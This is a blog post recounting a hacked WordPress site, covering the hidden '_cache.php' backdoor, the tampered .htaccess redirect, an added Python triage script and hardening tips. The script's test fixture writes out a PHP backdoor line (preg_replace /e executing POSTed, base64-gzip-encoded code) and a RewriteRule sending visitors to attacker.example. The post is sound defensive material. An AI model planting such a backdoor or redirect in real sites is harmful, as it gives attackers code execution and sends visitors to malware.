My Blog Was Hacked: Nightmare!

Last week my blog was hacked! What a nightmare. Before I continue, I would like to thank everyone who sent me a message advising me about the situation. Thank you so much for keeping an eye out for this blog. Also a huge thank you to my husband, who spent hours getting this all resolved.

I have been asked what happened and, in short, it got hacked. However, many were curious to know the details, so I asked my husband to write up a technical report that will hopefully help you avoid or resolve this problem should you ever have to deal with it.

Blog Was Hacked - What a nightmare!

What happened exactly? Someone found a way to place a script on my web server's file system, and that script would then modify a little file called .htaccess.

This unassuming little file is Apache's per-directory configuration file, and a couple of Redirect or RewriteRule lines in it are enough to send visitors coming to my blog to another site, usually one that serves malware. Google spotted this and started warning its users that my blog was infected with malware.

The problem was clear: my .htaccess file was redirecting people coming to my blog to a Russian website. My husband spotted the redirect relatively quickly, and we fixed the file and restored a working configuration from a backup.

We assumed we had fixed everything. Easy, we thought! That was wishful thinking: a few hours later we noticed that the .htaccess file had been modified again. Fixing the symptom didn't help; we had to find the source of the problem.

Blog was hacked: Malware Issues

It's like taking an aspirin when you have a fever. It reduces the fever, but if the fever is caused by an infection, treating only the fever is a short-term fix. That was the problem we were faced with.

It took several days and a lot of patience to run different levels of checks (database, file system, etc.) before we finally spotted a file that looked harmless because it was named "_cache.php". At first glance, judging by the name, it seemed like a legitimate system file.

However, its last-modified date was odd: it was more recent than any other PHP file on our system. Once we downloaded the file, we saw that it contained a call to the PHP function "preg_replace" whose arguments were written as hexadecimal escape sequences to hide the actual code. (preg_replace will execute its replacement string as PHP code when the pattern carries the /e modifier, which is the trick such one-line backdoors rely on.)

So if you search, as we did, for files containing scripts or the word "htaccess", you will never find it. The file isn't encrypted so much as obfuscated: it contains strings such as "\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x" that PHP turns back into ordinary characters only when the code runs (that particular fragment decodes to "eval ( gz", the start of an eval(gz...) unpacking wrapper). (This explanation was beyond me!)
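The three clues above (the injected .htaccess redirect, the "newest PHP file in the tree" timestamp, and the hex-escaped preg_replace one-liner that a plain grep never finds) as one added Python triage script. This is an illustrative example written for this page, not the post author's or her husband's code, and everything it scans is constructed here: the directory layout, the file contents, the placeholder hosts myblog.example and attacker.example, and the 30-day timestamp gap.

```python
"""Triage helper for a WordPress tree after the compromise described above.
Added example, not the post's own code; the site it scans is constructed
here. Checks: mtime outliers, hex-escaped/eval-style PHP, foreign redirects."""
import os
import re
import tempfile
import time
from pathlib import Path

HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
HEX_RUN = re.compile(r'(?:\\x[0-9A-Fa-f]{2}){8,}')  # 8+ escapes in a row
PREG_CALL = re.compile(r'preg_replace\s*\(\s*(["\'])(.*?)\1', re.S)
DANGEROUS = re.compile(r'\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(')
REDIRECT = re.compile(r'^\s*(?:Redirect(?:Match|Permanent)?|RewriteRule)\b'
                      r'.*?https?://(?P<host>[^/\s"\']+)', re.I)

def hex_escape(text: str) -> str:
    """Encode text as PHP \\xNN escapes, the way the backdoor hid its strings."""
    return ''.join(f'\\x{ord(c):02x}' for c in text)

def decode_hex_escapes(text: str) -> str:
    """Undo \\xNN escapes so a search for eval or htaccess can actually hit."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def preg_replace_uses_e(src: str) -> bool:
    """True if a preg_replace() pattern (delimiter+regex+delimiter+flags) has
    the e flag, which makes PHP eval() the replacement; removed in PHP 7."""
    for m in PREG_CALL.finditer(src):
        parts = re.fullmatch(r'(\W)(.*)\1([A-Za-z]*)', m.group(2), re.S)
        if parts and 'e' in parts.group(3):
            return True
    return False

def php_findings(src: str) -> list[str]:
    """Obfuscation markers in one PHP file; calls are matched on decoded text."""
    decoded = decode_hex_escapes(src)
    found = ['long run of \\xNN escapes'] if HEX_RUN.search(src) else []
    if preg_replace_uses_e(decoded):
        found.append('preg_replace() with /e modifier')
    return found + sorted({f'{name}()' for name in DANGEROUS.findall(decoded)})

def mtime_outliers(root: Path, gap_seconds: float = 86400) -> list[Path]:
    """PHP files modified more than gap_seconds after the median PHP mtime:
    an upgrade stamps the whole tree at once, so a lone newer file stands out."""
    times = {p: p.stat().st_mtime for p in root.rglob('*.php')}
    if not times:
        return []
    median = sorted(times.values())[len(times) // 2]
    return sorted(p for p, t in times.items() if t - median > gap_seconds)

def external_redirects(htaccess_text: str, own_host: str) -> list[str]:
    """Redirect/RewriteRule lines aimed at a host other than your own."""
    hits = []
    for line in htaccess_text.splitlines():
        m = REDIRECT.match(line)
        if m and m.group('host').lower() != own_host.lower():
            hits.append(line.strip())
    return hits

def scan_tree(root: Path, own_host: str) -> dict[str, list[str]]:
    """Run all three checks; keys are paths relative to root."""
    report: dict[str, list[str]] = {}
    def add(p: Path, reasons: list[str]) -> None:
        if reasons:
            report.setdefault(p.relative_to(root).as_posix(), []).extend(reasons)
    for p in root.rglob('*.php'):
        add(p, php_findings(p.read_text(errors='replace')))
    for p in mtime_outliers(root):
        add(p, ['mtime far newer than rest of tree'])
    for p in root.rglob('.htaccess'):
        add(p, [f'redirect to foreign host: {h}'
                for h in external_redirects(p.read_text(errors='replace'), own_host)])
    return report

def build_sample_site(base: Path) -> Path:
    """Constructed tree: clean files stamped 30 days ago, a backdoor dropped
    under wp-content today, and a tampered .htaccess."""
    root, old = base / 'site', time.time() - 30 * 86400
    clean = {
        'wp-includes/functions.php': "<?php function wp_hello() { return 'hi'; }\n",
        # an honest preg_replace (no /e) must not be flagged
        'wp-content/plugins/demo/demo.php': "<?php echo preg_replace('/\\s+/', ' ', $t);\n",
    }
    for rel, body in clean.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
        os.utime(root / rel, (old, old))
    # Backdoor: with /e, preg_replace runs the replacement string as PHP. Every
    # string is \xNN-escaped, so neither "eval" nor "/e" appears in the raw file.
    payload = 'eval ( gzinflate ( base64_decode ( $_POST["c"] ) ) ) ;'
    (root / 'wp-content' / '_cache.php').write_text(
        f'<?php preg_replace("{hex_escape("/.*/e")}", "{hex_escape(payload)}", "x"); ?>\n')
    (root / '.htaccess').write_text(
        "RewriteEngine On\n"
        "RewriteRule ^old-post$ https://myblog.example/new-post [R=301,L]\n"
        "RewriteRule ^(.*)$ http://attacker.example/landing.php?$1 [R=302,L]\n")
    return root

def demo_report(own_host: str = 'myblog.example') -> dict[str, list[str]]:
    """Build the constructed site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_site(Path(tmp)), own_host)

if __name__ == '__main__':
    print(*(f'{p}: {r}' for p, r in sorted(demo_report().items())), sep='\n')
```

Against a real install you would call scan_tree() on the web root with your own domain and expect it to list only the dropped file and the tampered .htaccess, as it does for the constructed site; the honest plugin and the core file stay silent. Two caveats: the timestamp heuristic only works while the attacker has not reset mtimes (many do), and decoding the escapes tells you what the dropper does, not how it got there, so the script is a triage aid, not a substitute for restoring a known-good copy of WordPress and finding the entry point.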

Blog was hacked: All clear

Once we had deleted the "_cache.php" file, we submitted a request to Google via Webmaster Tools to have them rescan our website and mark it as clean. After 4 days Google finished the scan, and we are happy to announce that we are now officially healed and clean!

What have we learned from this?

Here are a few tips on how to minimize the chance of getting your website/blog hacked, assuming that you are using an open-source Content Management System (CMS) such as WordPress:

– Keep it up to date: upgrade to the latest version of WordPress as soon as it is released, and do the same for your themes and plugins. Even minor updates may include fixes for critical security issues.

– Keep the use of third-party plugins to a minimum: it's nice to have additional features beyond what WordPress provides, but don't get carried away! Every plugin is extra code running with the same rights as WordPress itself, and an abandoned plugin never gets its security fixes.

– Set the permissions on the .htaccess file to 444, i.e. read-only (it's technical; if you know what that means, get it done, and if not, find a technical person to help you out). Be aware that this only stops casual edits: a script running as the same user that owns the file, like the _cache.php above, can change the mode back, so treat it as a speed bump, not a lock.

– Protect your database against injection attacks: hackers will try to mess with your database by entering SQL code into your form fields. In any code of your own, never paste form input straight into a query; use prepared statements (in WordPress, $wpdb->prepare()).

– Use passwords that are difficult to guess for both WordPress and your FTP account (and prefer SFTP, since plain FTP sends the password unencrypted).

– Back up your blog frequently, both the files and the database.

– Make sure that your computer/laptop is virus-free, since a keylogger on it hands over the FTP and WordPress passwords no matter how strong they are.

As we have often heard, "prevention is better than cure", so where possible do take the necessary measures to protect your website/blog. While I am fortunate to have my husband deal with this mess, it was nerve-wracking not knowing whether I would lose all my posts. Thank goodness it is now all resolved!

16 comments

  1. Thanks for sharing your learning Diana. I hope I never have to use this knowledge…fingers crossed. I am glad things are now back to normal.

    • Hi Janine, good to hear from you again 🙂 There was another blogger who had the same problem and thankfully, we have both resolved this problem. I hope it is something you don’t ever have to deal with!

  2. Good to have you back! What a nightmare! I wouldn't be able to deal with this on my own… Thanks for sharing your experience.

    • It really is and I wouldn’t know where to start. So grateful my husband understands all this coding and technical jargon. All I could do was hope that everything was backed up and no posts were lost 🙂 Thanks for dropping by and commenting again!

  3. Hey Diana,

    I am so sorry for what happened and I am scared now! I haven't updated; I am scared it might change a lot of things… does that happen? Or is it just easy?

    • Hi Hajra, if you are using a standard WordPress theme it should be relatively straightforward. However, for plugins you would need to check the compatibility of each plugin with the updated version. That could be more challenging. My husband recommends that you do a backup of the file system and database before you do the update. Hope that makes sense.

  4. Hi there!

    You don’t say where you found the _cache.php file. In the root directory of each site? (I host several sites on one server, all infected.)

    Thanks!

    • Hi Robbin, the _cache.php file was found under wp-content. We also host several sites on one server. Sorry for the delay in getting back. This comment was in the spam folder. Hope it helps!

  5. Sounds like an absolute nightmare!! thankfully you’re back and sorted now… useful tips!

    • Hi Maria, it was, and thank goodness my husband understands all this and dealt with it. I have recently heard that a few people have had their sites hacked. Not a pleasant experience at all!

  6. Wow Diana, what an ordeal! But thank you soooo much for sharing all that information. I’m sure it was difficult to write up and explain in simpler terms so I really appreciate your efforts! I do hope it never happens again. :-))

    • Hi Joy, it’s a pleasure to share this info to help others out if they got hacked or better yet to prevent it from happening. It helped that my husband volunteered to write the technical parts as it’s like a foreign language to me. Thanks for dropping by and sharing your thoughts.

  7. The solution is clear: We must have your husband cloned. How much would you charge for sending me one clone? (My thanks to Joy for alerting me to your post!)

    • It’s wonderful that my husband figured out the problem and resolved it but I don’t think we need to clone him hahaha. One of him is all the world can handle.

  8. What a mess! Glad you could fix it though the interim was a nightmare. Thanks for tipping us off as to how to avoid this happening.

    • It really was, and I am glad my husband was able to fix it. I have heard of a couple more people whose sites have been hacked since mine. Hopefully these tips will help you avoid this experience!